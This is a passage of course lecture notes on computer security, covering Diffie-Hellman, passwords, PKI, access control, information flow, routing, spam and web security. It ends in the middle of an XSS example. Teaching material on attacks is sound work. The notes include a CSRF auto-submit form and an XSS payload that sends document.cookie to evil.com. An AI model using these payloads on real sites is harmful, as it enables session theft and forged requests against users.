• the longer you have it
So change keys that get “used up”, and use “session keys”. If Alice and Bob
share a long-term key, generate a fresh key just for now and use the long-term
key to “handshake” and agree on which fresh key to use.
4. The hardest key to compromise is one that’s not in accessible storage (e.g. a key
that’s in a drive locked in a safe or stored offline).
5. Protect yourself against compromise of old keys (forward secrecy); destroy keys
when you’re done with them (and keep track of where the keys are)
For example, it’s bad if Alice tells Bob, ”Here’s our new key, encrypted under
the old key.” If Mallory records this message and later breaks the old key, she
now can also get the new key.
Diffie-Hellman key exchange (D-H): 1976
Like RSA, relies on a hardness assumption. Here, rely on hardness of “discrete log”
problem (given g x mod p, find x). g, p are public, and p is a large prime.
Alice Bob

←−−−−−−−−−−−−−
agree on g, p (public),
p = 2q + 1, q prime (“safe prime”)
random a, random b,

time
1<a<p−1 1<b<p−1
g a mod p g b mod p
−−−−−→←−−−−−
a
g b mod p mod p (g a mod p)b mod p
= g ba mod p = g ab mod p

Adversary’s best attack is to try to solve the discrete log problem. So Alice and Bob
know something that nobody else knows.
In practice, use H(g ab mod p) as a shared secret.
BUT: works against an evesdropper (“passive adversary”, “Eve”) but insecure if ad-
versary can modify messages (“man in the middle”, ”MITM” attack).
Upshot: D-H gives you a secret shared with someone.
Solution:
1. Rely on physical proximity or recognition to know who’s talking
2. Consistency check: check that A, B end up with the same value g ab or that A, B
saw the same messages.
5 Key Management 27

Alice Mallory Bob


a u v b
g a mod p g b mod p
−−−−−→ ←−−−−−
g u mod p g v mod p
←−−−−− −−−−−→
g au mod p ←−−−−→ g au g av ←−−−−→ g bv mod p

How?
Use digital signature (by one party, typically the server)
If Bob can verify Alice’s signature, but not the other way around, this still works (say
Alice is a well-known server).
This gives two properties at once:
• A authenticates B or vice verse
• No MITM, so A and B have a shared secret
D-H and forward secrecy:
Suppose Alice, Bob already have a shared key and want to negotiate a new key. Then
they can do a simple D-H key exchange, protected by old key, then get new key.
If an adversary doesn’t know the old key, can’t tamper with the D-H messages. Even
if the adversary gets an old key, not knowing the old key in real time means Mallory
can’t attack the D-H exchange, and can only be a passive adversary. So Alice and Bob
get forward secrecy with relatively low cost.
Another problem, similar to MITM:

Alice Mallory Bob


a b
g a mod p g b mod p
−−−−−→ ←−−−−−
1 1
←−−−− −−−−→
1a mod p 1b mod p

So abort if receive a 1. Another bad value is p − 1.


Note:
(p − 1)2 mod p = p2 − 2p + 1

mod p
= (0 − 0 + 1) mod p
=1
Then: (
1 if a is even
(p − 1)a mod p =
p − 1 if a is odd
28 5 Key Management

So also abort if receive p − 1.


If you chose a safe prime, 1 and p − 1 are the only bad values, and there’s a very
small chance that one of these would be sent legitimately (plus Alice and Bob may be
checking to make sure they don’t send them anyway).

Theorem 5.1. If p−1 2


is prime, then 1 and p − 1 are the only bad cases in DH. So, p
p−1
is a safe prime if 2 is also a prime.
6 Authenticating people 29

6 Authenticating people

SHA-3
NIST: 1997 new standardization effort to pick SHA-3
recently keccak picked
• fast to implement to implement in software, and really fast in hardware
• in practice, probably will be implemented in software, but brute force search to
break it will probably be done in hardware – slight conspiracy theory that NIST
picked so as to advantage attackers with larger resources

Authenticating: Make sure someone is who they claim to be


Three basic approaches, relying on
1. something you know (mother’s maiden name)
2. something you have (prox)
3. something you are (“biometrics”)

Something you know: passwords

Password threat model:


• user picks a password and remembers it
• to log in, user gives name, password
• adversary wants to log in as user
• adversary might be able to compromise server
First approach:
• server has “password database” of (name, password) pairs
• system verifies match
• Drawback: if adversary sees database, he/she can impersonate any user
Attacks (to get a user’s password):
• guessing attack
online: try to log in as user
offline: get password DB, computational search over passwords
• trick the user, or someone else who knows the password, into telling you – sur-
prisingly effective (“social engineering”)
• impersonate server, get user to “log in” to you (“spoofing”, “phishing”)
30 6 Authenticating people

• online guessing: try to log in with guessed name and password


• offline guessing: get password DB, computational search over passwords
• if user wrote down password, read it
• change the password database (somehow)
• watch the user log in, see what user types (“shoulder surfing”)
• compromise the user’s device (somehow) and record actions (e.g. “key logging”)
• get user’s password from one site, and try it on another
– most users have between 3-5 passwords they reuse
Countermeasures:
• teach users not to divulge passwords (such as having a box saying “AOL will
never ask you for your password”)
• make guessing harder
– implement a time delay after password failure (e.g. 2 seconds); this will slow
down guessing attacks
– limit number of failed attempts (“velocity control”), only for online guessing
– avoid informative error message if user fails to log in (so don’t say username
was right but password wrong)
– vs. offline guessing: slow down the verification code
∗ compute Hashn (PRF(...)) to verify password
∗ might slow verification by a factor of 1000
• server stores hash(password) rather than password, so password database doesn’t
convey passwords
• often, iterate hash: H(H(H(H(H...(password)...)))); slows brute-force search, but
adversary can try “dictionary attack” – hash many common passwords and build
a handy retrieval data structure
• to frustrate dictionary attacks, use a “salt”: for each user, generate a random
value Su , then store in password database (name, Su , Hash(password, Su ——
password))
Then an attacker would need to build a dictionary for each user
Note that salt is in password database and it is convenient to keep secret, but
hopefully password is strong enough for this to be okay even if the salt is leaked
Note: in this model, the server doesn’t store password
6 Authenticating people 31

Guessing is a serious problem in practice: people pick lousy passwords, and attackers
get more powerful all the time by Moore’s law
Reducing guessability:
• hard to quantify guessability
• only sure way: make password random, chosen from a large space (these are
usually hard to remember)
• format rules (e.g. special character and at least one uppercase character)
• require password to be longer (probably better than format rules)
Password hygiene
• like key hygiene
• change periodically and avoid patterns (“password1”, “password2”, ...)
• expire idle sessions (walk-away problem)
• require old password to change password
What if user forgets password?
• if hashed password is stored, can only set a new one
• else, can tell them password, BUT how do you know it’s not an impostor?
• clever solution by Gmail: if all else fails, we’ll give you a new password, but you’ll
need to wait before trying to log in again. Then legitimate user may log in and
see a warning during that time
Preventing spoofing:
• multi-factor authentication: password + something else (e.g. token, app)
• Evidence-based (Bayesian) authentication: treat password entry as evidence, but
not 100% certainty
– then use as much other evidence as possible (e.g. geolocation)
– other examples: device identity, software version, behavior patterns (espe-
cially atypical behavior)
– if confidence is too low, get more evidence
• distinctive per-user display
• distinctive unspoofable action before login
Windows CTRL-ALT-DEL before every time you enter password, always taking
you to legitimate login screen
32 6 Authenticating people

user system
password (p) random challenge (r)
name
−−−→
r (random)
←−−−−−−
PRF(p,r)
−−−−−→

• challenge-response protocol: (sign a challenge value)


– advantage: eavesdropper can’t replay a log-in session
– spoofer can’t impersonate the user later
• use one-time-passwords
security advantage, but logistical disadvantages: server has to serve more stuff,
might run out at an inconvenient time
• hash-chain: user generates random value x0 then chain with xi+1 = H(xi ). The
one-time passwords are xn−1 , xn−2 , . . . , x0 in this order, and the server checks that
each password is the hash of the next password. User remembers x0 and where
in chain they are.
• password + Diffie-Hellman: SPEKE (Simple Password Exponential Key Ex-
change)
Use D-H with public prime p, server stores g = (Hash(password))2 mod p
Results:
– user, server get shared secret from D-H
– MITH attack doesn’t work
– user only has to remember a password, not a key

Something you have

Typically, tamper-resistant device stores a key or some cryptographic secret.


It does crypto to prove the user has it.

Something you are

Definition. biometric
Measuring aspect of user’s body: fingerprint, iris scan, retina scan, finger length, voice
properties, facial features, hand geometry, typing patterns, gait 
6 Authenticating people 33

Basic scheme:
• enroll user: take a few measurements, compute “exemplar”
• later, when user presents self, measure, compare to exemplar; compute “distance”
to exemplar
• if “close enough”, accept as valid user, else reject: tradeoff in threshold between
false accepts and false rejects
Drawbacks:
• hard/impossible to follow good key hygiene (can’t change aspects of user’s body)
• often requires physical presence
• spoofing attacks; make image of body part, faking tempertature, inductance, etc.
(melted gummy bears moulded into finger-shape...)
• measurement is only approximate (need to control false positives and false neg-
atives)
• publicly obversable (eg. DNA, fingerprints)
34 7 SSL/TLS and Public Key Infrastructure

7 SSL/TLS and Public Key Infrastructure


Note: See piazza for lecture slides
Assumptions when logging in to, say Facebook on a Firefox browser
• Firefox is behaving correctly
• HTTPS certification is working correctly
• Facebook’s url is indeed facebook.com
But you must first verify all the above properties when you download firefox
But you must first update IE...
Essentially, you need a chain of digital certificates that verify the signatures on each
subsequent certificate or the website in question.
So, who is the entity on top? Verisign

• a company in the business of verifying websites


• firefox has decided to trust verisign certificates by default
But this means firefox must be working correctly, to both verify certificates and
trust Verasign!
Essentially, there is a massive tree of entities we need to trust to do anything on the
internet.

Observations on trust

Trust is not transitive.


The roots of trust are (hopefully a small number of) brands, such as Microsoft, Dell,
Mozilla, etc. Ideally, a user does not have to remember all the trustworthy brand
urls.
What’s not here:
wireless routers, the government, ISP.
Even though we don’t trust the network, a MITM attack is not possible because of
authenticated key exchange and TLS/SSL protocols. Crypto allows us to not trust the
network.
7 SSL/TLS and Public Key Infrastructure 35

Another problem

How does Firefox know that Facebook’s cert was signed by Verasign? Because Facebook
said so!
So what if Facebook provides a different cert authority?
Theory: We would only accept it if we trust the new CA
Pracice: Firefox comes with a list of trusted CAs. However, if any one of them is
malicious, it can certify any other malicious urls and you are screwed.

Attacks

If there exists an adversary (let’s call it NSA, for non-specific adversary) and a rogue
CA, how might they MITM you?
1. Issue rogue certs for target sites
2. Select users ot target, install MITM boxes at their ISP(s)
How are these attacks detected?
1. Browser remembers old cert and alerts server if “something’s wrong” ie. the new
one seems suspicious
2. Server notices lots of users logging in from the same IP (or better, the same
device fingerprint)
Because it’s easily detected, having a NSA MITM-ing seems pretty uncommon.

Public Key Infrastructure

Infrastructure to create, distribute, validate, and revoke certs.


It is comprised of a small number of roots hierarchically certifying various entities.
Clients trust these roots, and transitively follow the chain of trust from server back to a
root. The standard is X.509 (which has a full spec of thousands of pages. Really).
There are generally cross-links between root CAs in that they certify each other, so
that even if you remove root C as a trusted root CA, roots A and B might delegate to
C, meaning it is still trusted.
36 7 SSL/TLS and Public Key Infrastructure

Certificates

Binds an entity to a public key. Signed by some issuer (CA) and contains identity of
issuer and an expiration time.
How does a server obtain a cert? The server generates a key pair and signs its
public key and ID info with its private key to prove that server holds the private key;
also provides message authentication.
The CA verifies the server’s signature using the server’s public key. Hard problem:
How do you know that it’s actually the server that’s sending the info?
The CA then signs the server’s public key with CA key which creates a binding. It the
server can verify the key, ID, and CA’s signature, it’s good to go.
Almost all SSL clients except browsers and key SSL libraries are broken, often in hi-
larious ways.
Three hard problems
1. Naming and identity verification. How do you know that whoever is requesting
a certificate is who they say they are?
2. Anchoring. Who are the roots that are trustworthy?
3. Revocation. If something goes wrong, how can they shut off a certificate?

Naming and identity verification

Zooko’s Triangle
For any naming system, you want it to be unique, human-memorable, and decentral-
ized. Pick 2, because you can’t get all 3.

Example. Real names are not unique. Domain names are not decentralized. Onion
addresses are not human memorable. 

Two types of certs


1. Domain Validation
The standard name = DNS name (domain) way of issuing certificates. It’s usually
automated and email-based.
2. Extended Validation
You see the name of the entity behind the url (eg. Microsoft). Browers show
you the name in the URL bar and/or a green lock. The browser doesn’t need to
check the url in this case.
7 SSL/TLS and Public Key Infrastructure 37

Anchoring

Which roots should you trust? If you can issue certs, you can run MITM attacks on
certs.

Revocation

This is different from expiration (which is for normal key hygiene). It involves
1. Authenticating the revocation request
If you’re not careful, it is an easy DOS! Also can’t ask for an old key because the
entity might not have it.
Solution: Sign a revocation request every time you get a new key and “lock
away” this request. If anything happens, you can send the revocation request.
2. Keeping clients up to date
Offline model: Certificate revocation list; issue an “anti-certificate”
Online model: OCSP (online cert status protocol) is a CA’s server that can be
queried for certificate statuses in real time
Note that revocation often fails in practice. Most browsers only check for EV certs,
which can be 6 months out of date.

So what happens when a CA doesn’t respond? What should your browser do?
• Can’t just not give you access; this would mean that the entire internet is broken
when CA is down.
Sites like Facebook are probably better at keeping their site up than VeriSign. Also,
it’s an easy DOS attack to take down a CA.
Result: Browser just goes ahead if CA is down.
38 8 Access control

8 Access control
How you reason about and enforce rules about who’s allowed to do what in the system.

Secure system design = secure components + isolation + access control.

This deals with authentication (Who is asking?), not authorization (Does that per-
son have permission?).

Two authorization approaches:


• access control matrix/list
• capabilities

Definition. Trusted subsystem


A program, with state, that is isolated from the rest of the world, and interacts via
declared interfaces 

Access control: SUBJECT wants to do VERB on OBECT. Okay?


Policy: a set of (S,V,O) triples that are allowed
• How to determine policy? (should)
• How to enforce policy? (is)
One data structure: Access Control Matrix
←− objects −→

subjects

V1 , V2

Subjects and labels

• subject = some process


• Object is some resource (file, open network connection, window)
• often, give labels to subjects and set policy based on labels e.g. label a process
with a user id
(+) reduces matrix size
(+) easier to make policy based on labels
(–) oversimplifies? Suppose: label = userid and means program is running “for”
8 Access control 39

userid. Alice runs a program written by Bob (example: Alice uses a text editor
written by Bob to edit Alice’s secret file). What label?
– If treat as Alice: Bob’s code can send Alice’s secret data to Bob
– If treat as Bob: Alice can’t edit her secret file, can read Bob’s files
– If treat as Bob but special for this file: none of the labelling benefits
– If treat as intersection of privileges: get all the drawbacks
• Common approach in OS (e.g. Linux): setuid bit
– Bob decides whether program runs as himself or invoker
Store access control info:
• as AC matrix - note that this will be very sparse
• as “profiles” - for each user, list of what subject can do (i.e. row of AC matrix)
• as Access Control List (ACL) - for each object, list of (Verb, Subject) pairs (who
can do what to it). This is typically used because small and simple in practice.
Often, ACL are stored along with object.
Who sets policy?
• centralized (“mandatory”) - done by an authority
(+) done by a well-trained person
(+) might be required (ethical, legal, or contractual obligations)
(–) inflexible, slow
• decentralized (“discretionary”) - each object has an owner, owner set ACLs
(+) flexible
(–) every user makes security decisions (mistake-prone)
• mix - owner can choose, within limits set by centralized authority
Groups and Roles:
Group is a set of people with some logical basis; role is group with one member
Advantages:
• makes ACL smaller, easier to understand
• change in status naturally causes change in access to resources
• ACL encodes reason for access in system (i.e. why you have access)
Roles can be hidden temporarily, “wearing different hats” (useful for testing)
40 8 Access control

Traditional Unix File Access

File belong to one user, one group.

ACL for each operation contains subset of {user, group, everyone}. Every VERB re-
quires 3 bits for each operation.

Every file also has a setuserid bit.


• treat as file owner if setuid = true item treat as invoker if setuid = false

Capabilities

A different approach to access control: controls access without identification, like a


physical key, “the bearer has permission to do VERB on OBJECT.”
Sometimes make them revokable, but that’s a pain to do in practice
Implementation: crpytographic
1. system has a secret key k, capability = MAC(k, verb —— object)
2. public-key: one party grant permission (makes digital signature), another party
control access (makes sure handed valid capability - verifies signature)
Implementation: OS table
OS stores a list of your capabilities; Alice makes a system call to give Bob capabilities
for a certain file (file descriptors used to say you’ve an open file are an example)
Implementation: in a type-safe programming language (like Java), pointer to an object
is a capability

Tradeoffs:
• cryptographic
(+) totally decentralized
(–) if capability leaks, big trouble
want some kind of revocation, but hard to do
• OS table
(+) can control flow of passage of capabilities
(+) revocation is much easier
(–) centralized, requires overhead, lack of flexibility,
8 Access control 41

Logic-based authorization

Define a formal logic, with primitives for


• principals (e.g. users/groups)
• objects
• delegation
• time
To get access, submit a proof that you are authorized
Parties make statements by digital signing
System allows for great complexity in policies, but only need simple proof- checking
mechanism to make it work. But also need to work out a way to get people able to
write these statements, and deal with possible large proof size
Caveat: people don’t actually use complicated access control mechanisms, and usually
just leave them as the defaults or make it visible to the whole world
Want to come up with a system which infers what the user wants from the way the user
behaves (best if not visible to user) ¿¿¿¿¿¿¿ 8e525b42b773087a879a1983645b17cc93ee0bb7
42 9 Information flow and multi-level security

9 Information flow and multi-level security


Information flow: how to control propagation of information within a program or
between programs on a system where there is some confidentiality requirement.
Consider a program P (v, s, r):
• v: visible (public) input
• s: secret input
• r: random seed
Output: all visible actions of program. Output doesn’t ”leak” s.
Does the output of P leak information about s? Define a game against adversary
guessing between two possible secrets s (similar to semantic security). To avoid leakage,
the distribution of outputs must be independent of s for all possible values of v.
Game:
• adversary chooses v, s0 , s1
• we announce P(v, sb , r), where b ∈ {0, 1}, r are secret and random
• adversary guesses b
We say P doesn’t leak s if adversary can’t be correct with probability non-negligibly
greater than 50% (assuming a computationally-limited adversary).
How to enforce non-leakiness?
Unlike with previous properties, cannot enforce by watching P run. (Just because no
output came out doesn’t mean there wasn’t a leak - “dog that didn’t bark problem”).
We can’t prove this property by testing. It’s inherently necessary to consider what-ifs
that differ from what you actually saw.
Also, in practice requirement are more complex (more complex labels, and different
labels on different data).
Generalization:
• label information (e.g. inputs)
• put requirements on outputs
• enforce that outputs respect requirements

Lattice model

General model for information flow policy


9 Information flow and multi-level security 43

Definition. Lattice
(S, v), S: set of states, v: partial order such that for any a, b ∈ S, there is a least
upper bound of a, b and a greatest lower bound of a, b.
partial order:
• reflexive: a v a
• transitive: a v b and b v c, then a v c
• asymmetric: a v b and b v a, then a = b
least upper bound of a, b:
• a v U and b v U and for all V ∈ S, a v V and b v V ⇒ U v V
greatest lower bound of a, b:
• L v a and L v b and for all V ∈ S, V v a and V v a ⇒ V v L


Example. Lattices
1. linear chain of labels:
public v confidential
unclassified v classified v secret v top secret
2. compartments (e.g. project, client ID, job function)
state is set of labels, v is subset
3. org chart
state is node in chart, v is ancestor/descendant
4. combination/cross product of lattices
state is (S1 , S2 ), (A1 , B1 ) v (A2 , B2 ) iff A1 v A2 and B1 v B2


Information flow in a program

At each point in the program, every variable has a state/label (that comes from the lat-
tice we’re using). Inputs are tagged with state. Outputs are tagged with a requirement.
States are propagated when code executes.
Example: a = b+c; State(a) = LUB(State(b), State(c)) [LUB = Least Upper Bound]
44 9 Information flow and multi-level security

Before providing output, check that state of output value is consistent with policy. (For
example, only allowed to emit unclassified output.) Formally, ensure that label(v) v L,
where L is the required policy.
But this isn’t enough (only monitoring and rejecting when inconsistent with policy) –
“dog that didn’t bark”:
// State(a) = ‘‘secret’’
// State(c) = State(d) = public
b = c;
if (a > 5) b = d; // Requires static (compile-time) analysis to get right
output b; // Says something about a, so should be labelled as secret
Static analysis won’t catch all, but will catch some of the leaks.
Problem 1: conservative analysis leads to being overly cautious
Problem 2: timing might depend on values (can lead to covert channel attacks)
What if you can’t prevent a program from leaking the information it has?
Conservative assumption (contagion model): every programs leaks all its inputs to all
its outputs.
Bell-LaPadula model: lattice-based information flow for programs and files
• every program has a state (from lattice): what it’s allowed to access
• every file has a state: what it contains
• Rule 1: “No Read Up” - Program P can read File F only if State(F ) v State(P )
• Rule 2: “No Write Down” - Program P can write File F only if State(P ) v
State(F )
Theorem. If State(F1 ) v State(F2 ) and the two rules are enforced, then information
from F2 cannot leak into F1 .
Problems:
1. exceptions (need to make explicit loopholes in system to allow)
• declassify/unprotect old data
• what about encryption (hope ”secret” ciphertext doesn’t leak plaintext)
• aggregate/“anonymized” data
• policy decision to make exception
2. usability - system can’t tell you if there are classified files in a directory you’re
trying to delete or no space on disk for you to add a file
3. outside channels - people talk to each other outside the system
9 Information flow and multi-level security 45

This, so far, has been about confidentiality. Can we do the same thing for integrity?
• State: level of trust in integrity of information
• ensure high-integrity data doesn’t depend on low-integrity inputs (try to avoid
GIGO problem)
Biba model: (B-LP for integrity)
• Label/state: how much we trust program with respect to integrity/how important
file is
• Rule 1: “No Read Down”
• Rule 2: “No Write Up”
B-LP model and Biba model at the same time?
• if use same labels for both (high confidentiality = high integrity), then no com-
munication between levels
• if different labels, then some information flows become possible, but could result
in being much more difficult for users
• result: usually focus on confidentiality or integrity and let humans worry about
this outside of the system
Back to crypto...
Secret sharing:
• divide a secret into “shares” so that all share are required to reconstruct secret
– 2-way: pick a large value M , secret is some s, 0 ≤ s < M
pick r randomly, 0 ≤ r < M
shares are r, (s − r) mod M
to reconstruct, add shares mod M
– k-way: shares r0 , r1 , . . . , rk−2 random, (s − (r0 + · · · + rl−2 )) mod M
– can also construct degree k polynomials such that k values are needed to
reconstruct
• suppose RSA private key is (d, N ), shares (d1 , N ), (d2 , N ), (d3 , N ) such that d1 +
d2 + d3 = d mod (p− 1)(q− 1)
X d1 mod N X d2 X d3 = X (d1 +d2 +d3 ) mod (p−1)(q−1) mod N = X d mod N
(splits up an RSA operation)
46 10 Securing network infrastructure

10 Securing network infrastructure


The internet is a network of networks. Each network is an “autonomous system” such
as ISPs. For example, Princeton is one autonomous system. Each autonomous system
is run by a separate administrator, and they connect together at exchange points.
There are about 40,000 autonomous system numbers assigned.
Internet routing
Routing is based on BGP (border gateway protocols). BGP is how autonomous systems
talk to each other about routing information. IP is the actual routing protocol.
Shortest path routing
This is a simplified way of viewing BGPs. Think of each autonomous system as a single
node.
• routers talk to each other
• they exchange topology and cost info
• each router calculates the shortest path to destination based on its neighbors’
distances
“If my closest neighbor can get to destination in 4 steps, then I can get there in
5 steps”
BUT routers can lie about paths and costs
• router calculates the next hop based on neighboring path costs
• router forwards packet to the next hop
An adversary node can lie about its costs and route packets to itself. There might exist
a tunnel for packet reinjections if Z and Z’ are both adversarial. Then, Z can modify
all packets and send it to Z’ for reinjection. This is called prefix hijacking

Prefix Hijacking

(This often happens as a result of accidental misconfiguration).

Example. China “hijacked the internet” when it announced route to a random-ish


15% of the internet. It is an autonomous system (AS) big enough that it didn’t get
crushed under the load, and simply forwarded the traffic while the user did not notice
anything. 

Malice is unlikely through prefix hijacking


1. can’t bypass app-level encryption
10 Securing network infrastructure 47

2. can’t store all the traffice


3. it’s very easily detectable

How to defend?

Can crypto help? Remember that AS’s can lie about their own links and costs and
about what other nodes said. So, crypto can prevent lying about what neighbors said
but it can’t prevent lying about your own links.
Routing relies on trust
It is a different adversary model compared to application-layer security.
• small number of AS’s
• AS’s are well known
• and physically connected
• AS’s also don’t want to advertise shorter paths than reality because then they
will likely be overloaded with traffic and go down
All of the above are natural protection against attacks. It’s not an ideal setup, but it’s
not terrible either. Is there a much better way to design BGP if we were to do it over?
Unclear.

IP packet

These contain source and destination IP addresses. Can these things be spoofed?
• source IP? yes
• destination IP? no, that doesn’t even make sense
Nodes can only verify claimed source address back one hop; this is why IPs are spoofa-
ble. For example, DoS attacks spoof their return IP addresses.

Ingress/egress filtering

(This is what takes place at the “gateway” of the AS)


Ingress filtering: discard incoming packet if source IP is inside the AS (because why
would that happen in real life? It wouldn’t). This protects against types of DoS.
Potects yourself.
48 10 Securing network infrastructure

Egress filtering: discard outgoing packet if source IP is outside. This protects against
types of DoS if adversary takes over internal computer and tries to send DoS packets.
Protects the rest of the internet.
DDoS is easy if you have a lot of zombies
More difficult: DoS from a single machine with more traffic than machine is capable
of. So the goal? Amplication of traffic volume.
Smurf attack
Attacker broadcasts ECHO request with spoofed source IP address (this is the victim’s
IP address). All networks hosts (broadcast recipients) hear broadcast and respond.
Except they respond to the victim, who is overwhelmed with traffic.

DNS attacks

DNS: The system that takes a domain name and translate it into an IP address.
User requests example.com → recursive name server → root server → recursive name
server → TLD name servers → recursive name server → thousands of name servers
→ recursive name server → 192.168.31
Root servers
Requests are delivered to the root server who is closest and available.
Cache poisoning
In the words of Wikipedia: “DNS spoofing (or DNS cache poisoning) is a computer
hacking attack, whereby data is introduced into a Domain Name System (DNS) re-
solver’s cache, causing the name server to return an incorrect IP address, diverting
traffic to the attacker’s computer (or any other computer).”

Prevention: DNSSEC

DNS root servers: root of trust


DNS hierarchy: chain of trust; each name server signs public keys of servers it delegates
to. Resolvers and some clients have root public keys built in. This only authenticates
– no encryption.

Crypto and layers

Crypto can be incorporated into different layers:


Secure sockets layer (SSL) and transport layer security (TLS)
• Application level security (or rather, between application and transportation)
10 Securing network infrastructure 49

• Authentication hostnames, encrypts sessions over TCP


• Keys verified using certs/certificate authorities
IPSec
• Network layer security
• Authenticates IP addresses, encrypts IP packets
• Keys are distributed/verified by DNA or manually
• It’s a mess because (1) key distribution sucks (2) authenticating IP addresses is
hard for user to sanity check (3) network level is hard to implement since IP is
stateless
NSA MUSCULAR
NSA was physically tapping into links between Google data centers, and between Yahoo
data centers. IPSec would have stopped this.
50 11 Spam

11 Spam
Focus on email.
Scope of problem:
• Vast majority of email is spam (99+%)
• Lots is fraudulent (or inappropriate)
• 5% of US users have bought something from a spammer
The anonymity makes this attractive for certain kinds of products
• Spamming often pays (low cost to send, so need little success to profit)
Review: how email works
• Messages written in standard format
– Headers: To, From, Date, ...
– Body: can encode different media types in body
• Traditionally:
sender’s SMTP sender’s SMTP recipient’s IMAP recipient’s
−−−→ −−−→ −−−→
computer MTA MTA computer
(MTA: Mail Transfer Agent)
• Webmail model:
sender’s recipient’s HTTP(S)
sender’s HTTP(S) SMTP recipient’s
−−−−−→ mail −−−→ mail −−−−−→
computer computer
service service
• More complexities:
– Forwarding
– Mailing lists
– Autoresponders

Economics of spam

It is very cheap to send email.


Most of the cost falls on recipient
• Needs to store message
• Human takes the time to actually read the message
Sender will send when sender’s cost < sender’s benefit. What we would like: send
when total cost < total benefit.
11 Spam 51

Anti-spam strategies

Laws, technology, or combination


Note that most spam is already illegal (either fraudulent offer, false adverising, or
offering an illegal product).

Definition. Spam
1. Email the recipient doesn’t want to receive
Problems:
• Defined after the fact
• Legally problematic (anyone can say they didn’t want some message)
• Not what you want (just not wanting it doesn’t make it spam)
2. Unsolicited email
Problems:
• What does this mean? (May not explicitly have asked for a given email)
• Lots of unsolicited email is wanted
3. Unsolicited commercial email
Problems: less than in definition 2, but still the same issues


Free speech: (legal constraint, principle we’d like to honor)


• Minimum: don’t stop a communication if both parties want it
• Legally, there’s no absolute right not to hear undesired speech.
• Commercial speech gets less protection than political speech.

Definition. Spam (CAN SPAM Act)


Any commercial, non-political email is spam unless:
(a) it’s non-commercial, or
(b) it’s political speech, or
(c) recipient has explicitly consented to receive it, or
(d) sender has a continuing business relationship with recipient, or
(e) email relates to an ongoing commercial transaction between the sender and receiver
52 11 Spam

Note: this definition is not testable in software.


Vigorous enforcement against wire fraud, false medical claims, etc. (can follow the
money)
Law against forging the From address is surprisingly effective
Disadvantages for spammer:
• Forced to identify themself
• Easy to filter
Private lawsuits
• ISP sue spammer to cover their server resources, etc.
(AOL: sue spammers and give a random user their stuff!)
• Serves as a deterrent (expensive to bring lawsuit)
Laws have succeeded in drawing a line between spam and legitimate businesses.
Anti-spam technologies:
• Blacklist:
List of “known spammers”, refuse to accept mail from them
– If list holds From addresses: Spammer will spoof From address (then spam-
mer is also breaking the law)
– If list holds IP addresses: Spammers move around, compromise innocent
users’ machines and send spam from there (very common); also note that
outgoing email IP address is often shared
How aggressive should you be about putting people on the blacklist?
– Too slow: spammers can get away with spamming
– Too quick: false blocking
Denial of service: forge spam ”from” victim
• Whitelist:
List of people you know, reject email from everybody else
– Blocks too much
– But: can combine with other countermeasures (exempt certain people from
another countermeasure)
11 Spam 53

• Require payment (Pay-to-send):


– Pay in money:
Sender pays receiver
OR sender pays receiver IF receiver reports messsage as spam (generates
incentive problem for reciever)
OR sender pays charity if receiver reports as spam
Problem: really expensive for large mailing lists
– Pay in wasted computing time:
Sender must solve some difficult computational puzzle
Works internationally, but big problem for large mailing lists, destroys com-
puting time
– Pay in human attention:
CAPTCHA
Can hire solving of CAPTCHAs in various ways (sweatshops, make people
solve to see porn, ...)
– Pros and Cons
(a) raises cost of spamming (+)
(b) often raises cost of legit mail (-)
(c) often wastes resources rather than transferring them (-)
• Sender authentication
– address-based (e.g. Princeton says which IPs can send @princeton.edu From
address)
– signature by domain owner
• Content-based filtering:
Recipient applies filter algorithm ot content of incoming email
– Early days: keyword-based
Lots of false positives, ways to work around these
– Now: word-based machine learning, often also personalized (relying on user
to label as spam or not)
Spammer can test the non-personalized part by making an account and
seeing what gets marked as spam – until filters started looking for the word-
salad test messages
54 11 Spam

– Collaborative filtering: use other users’ reports as indicator of spam


Robocalls now a huge problem: FTC gave public challenge to solving this
12 Web Security 55

12 Web Security
Note: see piazza for lecture slides
Two sides of web security
1. browser side
2. web applications
• written in php, asp, tsp, ruby, etc.
• include attacks like sql injection
Some web threat models include passive or active network attackers, and malware
attackers, who control a user’s machine by getting them to download something.

Browser execution model

1. Load content
2. Renders (processes html)
3. Responds to events
• User actions: onClick, onMouseover
• Rendering: onLoad
• Timing: setTimeout(), clearTimeout()

Javascript
There are three ways to include javascript in a webpage: inline <script>, in
a linked file <script src="something" >, or in an event handler attribute <a
href="example.com" onmouseover="alert(‘hi’)" >
The script runs in a “sandbox” in the front end only.

Same-origin policy
Scripts that originate from the same SERVER, PROTOCOL, and PORT may access
each other/each other’s DOMS with no problem, but they cannot access another site’s
DOM. The exception to this is when you link js with a <script src="" >.
The user is able to grant privileges to signed scripts (UniversalBrowserRead/Write)
Frame and iFrame
A Frame is a rigid division. An iFrame is a floating inline frame. They provide
structure to the page and delegate screen area to content from another source (like
56 12 Web Security

youtube embeds). The browser provides isolation between the frame and everything
else in the DOM.

Cookies

After a request, a server might do set-cookie: value. When the browser revisits
the page, it will GET ... cookie: value and the server responds based on that
cookie.

Cookies hold unique pseudorandom values and the server has a table of values. So,
cookies are often used alongside authentication. BUT it’s only safe to use cookie au-
thentication via HTTPS; otherwise, someone can read the “authenticator cookie”.

CSRF: Cross-Site Request Forgery

The same browser runs a script from a good site and malicious script from a bad site.
Requests to the good site are authenticated by cookies. The malicious script can make
forged requests to the good site with the user’s cookie.
• Netflix: change account settings
• Gmail: steal contacts
• potential for much bigger damage (ie. banking)
How might this happen?
1. User establishes session with victimized server
2. User visits the attack server
3. User receives malicious page
<form action="victimized server page form">
<input> fields </input>
</form>
<script> document.forms[0].submit() </script>
4. attack server sends forgest request to victimized server via the user and this form
Login CSRF
Attacker sends request so that victim is logged in as attacker. Everything the victim
does gets recorded on the attacker’s account; or, if the victim is receiving incoming
payments/messages, the attacker will get them.
CSRF Defenses
12 Web Security 57

• Secret validation token <input type="hidden" value="1124lfjq2l3ir" >


You want to bind the sessionID to a particular token. How? (1) a state table at
the server or (2) HMAC of sessionID
• Referer validation (in the header). An attacker script will say that referer is
“attacker.com”
Lenient: referer in header=optional
Strict: referer in header=required

To prevent login CSRF, you want strict referer validation and login forms sub-
mitted over HTTPS. HTTPS sites in general use strict referer validation. Other
sites use ROR or frameworks that implement this stuff for you.
• Custom HTTP header. X-Requested-By: XMLHttpRequest

Cross Site Scripting (CSS)

Example. evil.com sends the victim a frame:

<frame src="naive.com/hello?name=
<script>window.open(’evil.com/steal.cgi?cookie=’’ + document.cookie)</script>
">

Then, naive.com is opened and the script is executed, where the referer looks like
